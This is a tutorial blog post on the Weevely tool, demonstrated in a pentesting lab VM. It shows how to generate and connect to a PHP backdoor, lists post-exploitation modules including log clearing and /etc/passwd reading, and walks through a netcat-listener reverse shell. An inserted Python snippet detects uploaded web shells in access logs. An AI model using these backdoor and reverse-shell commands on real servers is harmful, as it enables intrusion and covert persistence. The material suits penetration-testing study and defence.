Weevely is a command-line tool used to generate web shells. It also provides a clean command-line environment to execute code on the target server after the shell has been uploaded.
With the weevely terminal we can execute arbitrary code through the uploaded PHP shell on the target web server. It also provides more than 40 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target server.
Some of the main features of weevely are :
- Ssh-like terminal
- Shell access to the target
- SQL console pivoting on the target
- HTTP/HTTPS proxy to browse through the target
- Host configuration security auditing
- Upload and download files
- Spawn reverse and direct TCP shells
- Audit remote target security
- Run Meterpreter payloads
- Port scan pivoting on target
- Mount the remote filesystem
- Reverse and direct TCP shell
- Bruteforce SQL accounts pivoting on the target
- Meterpreter support
- Service account bruteforce
- Compressed archive management
Installation process of weevely :
weevely3 download link : https://github.com/epinna/weevely3/archive/master.zip
In Linux based systems ( Ubuntu/Debian ):
Installing the dependencies :
sudo apt-get install g++ python2.7 python-pip libyaml-dev python-dev libncurses5-dev
Or you can also install the dependencies with Python pip. First go inside the weevely3 directory :
cd weevely3
And type the below command :
sudo pip install -r requirements.txt --upgrade
Usage :
To generate a PHP webshell/backdoor, the command will be :
./weevely.py generate <password> <file_name>
where
- password is used to connect back to the webshell on the target server.
- file_name is the name of the webshell/backdoor file.
./weevely.py generate 12345 shell.php
The above command will generate a webshell named shell.php.
Now let's upload the webshell file for further demonstration. For this I am going to use the Web for Pentester VM. To set up the test lab with Web4Pentester, please visit the below link :
http://www.sec-art.net/2018/03/how-to-install-web-for-pentester-vm-in.html
First we have to upload the webshell on the target server.
Now to connect to the webshell through weevely, use the below command :
./weevely.py <URL> <password>
Where :
"URL" means the full URL of the webshell on the web server, which in our case is : http://192.168.56.101/upload/images/shell.php
"password" is the password which we gave at the time of webshell creation, which is 12345
Now let's try to connect to the webshell,
./weevely.py http://192.168.56.101/upload/images/shell.php 12345
and as we can see, we are successfully connected to the target web server via the webshell. It gives a remote shell, through which we can run shell commands on the server, for example :
weevely> ls
hacker.jpg
shell.php
www-data@debian:/var/www/upload/images $ uname -a
Linux debian 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux
www-data@debian:/var/www/upload/images $ ls
hacker.jpg
shell.php
www-data@debian:/var/www/upload/images $ pwd
/var/www/upload/images
www-data@debian:/var/www/upload/images $
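Seen from the defending side, the listing above is the indicator: a .php file sitting in an image upload directory and being requested over HTTP. The sketch below is an added example, not part of the original post or of weevely; it scans access-log lines for successful requests to script files under the upload path. The combined log format and the /upload/ prefix are assumptions, and the sample lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Assumption: uploads are served from /upload/ (the path used on this page)
# and that directory should only ever hold static files such as images.
UPLOAD_PREFIXES = ("/upload/",)
# Extensions a PHP handler commonly executes; (/|$) also catches PATH_INFO.
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)(/|$)", re.IGNORECASE)
# Apache/nginx "combined" format: ip ident user [time] "METHOD target proto" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def script_hits(lines):
    """Count 2xx requests for script files under upload dirs, keyed by (client, path)."""
    hits = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        # Drop the query string and decode %-escapes before matching.
        path = unquote(urlsplit(m.group("target")).path)
        if (path.lower().startswith(UPLOAD_PREFIXES)
                and SCRIPT_RE.search(path)
                and m.group("status").startswith("2")):
            hits[(m.group("ip"), path)] += 1
    return hits

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    '192.168.56.1 - - [10/Mar/2018:10:00:01 +0000] "GET /upload/images/hacker.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [10/Mar/2018:10:00:09 +0000] "POST /upload/images/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [10/Mar/2018:10:00:12 +0000] "POST /upload/images/shell.php HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [10/Mar/2018:10:00:15 +0000] "GET /upload/images/shell%2Ephp?x=1 HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
    '192.168.56.20 - - [10/Mar/2018:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.56.20 - - [10/Mar/2018:10:01:03 +0000] "GET /upload/images/test.phtml HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (client, path), count in script_hits(SAMPLE_LOG).items():
        print(f"{count:3d} request(s) from {client} to {path}")
```

On a server where the upload directory holds only images, any hit is worth investigating. Disabling the PHP handler for that directory keeps an uploaded script from executing at all.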
Running the extension Modules :
Currently there are more than 40 modules available to use in weevely. To use them we just need to type the below command on the remote shell
:<module_name>
For example :
:system_info
The system_info module collects system information.
To get the full list of available modules type :
:help
Module | Description
:audit_filesystem | Audit the file system for weak permissions.
:audit_suidsgid | Find files with SUID or SGID flags.
:audit_disablefunctionbypass | Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_etcpasswd | Read /etc/passwd with different techniques.
:audit_phpconf | Audit PHP configuration.
:shell_sh | Execute shell commands.
:shell_su | Execute commands with su.
:shell_php | Execute PHP commands.
:system_extensions | Collect PHP and webserver extension list.
:system_info | Collect system information.
:system_procs | List running processes.
:backdoor_reversetcp | Execute a reverse TCP shell.
:backdoor_tcp | Spawn a shell on a TCP port.
:backdoor_meterpreter | Start a meterpreter session.
:bruteforce_sql | Bruteforce SQL database.
:file_gzip | Compress or expand gzip files.
:file_clearlog | Remove string from a file.
:file_check | Get attributes and permissions of a file.
:file_upload | Upload file to remote filesystem.
:file_webdownload | Download an URL.
:file_tar | Compress or expand tar archives.
:file_download | Download file from remote filesystem.
:file_bzip2 | Compress or expand bzip2 files.
:file_edit | Edit remote file on a local editor.
:file_grep | Print lines matching a pattern in multiple files.
:file_ls | List directory content.
:file_cp | Copy single file.
:file_rm | Remove remote file.
:file_upload2web | Upload file automatically to a web folder and get corresponding URL.
:file_zip | Compress or expand zip files.
:file_touch | Change file timestamp.
:file_find | Find files with given names and attributes.
:file_mount | Mount remote filesystem using HTTPfs.
:file_enum | Check existence and permissions of a list of paths.
:file_read | Read remote file from the remote filesystem.
:file_cd | Change current working directory.
:sql_console | Execute SQL query or run console.
:sql_dump | Multi dbms mysqldump replacement.
:net_mail | Send mail.
:net_phpproxy | Install PHP proxy on the target.
:net_curl | Perform a curl-like HTTP request.
:net_proxy | Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_scan | TCP Port scan.
:net_ifconfig | Get network interfaces addresses.
To get the help page for a module, type the below command :
:<module_name> -h
Example :
:system_info -h
Now let's test some more modules :
:file_download - Used to download a file from the remote server.
:file_upload - Used to upload a file to the remote server.
:file_read - Used to read files from the remote server.
:backdoor_reversetcp - Execute a reverse TCP shell. First start a netcat listener on your local machine by :
nc -lv 9001
Now the TCP listener is started on port 9001, then type the below command on weevely terminal :
:backdoor_reversetcp 192.168.56.1 9001
where 192.168.56.1 is the IP of the local machine. After a few moments we get the reverse shell.
:net_ifconfig - Get the network interface addresses.
Conclusion :
Weevely is a very powerful tool to get a remote shell on web servers, and to exploit a file upload vulnerability.
Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html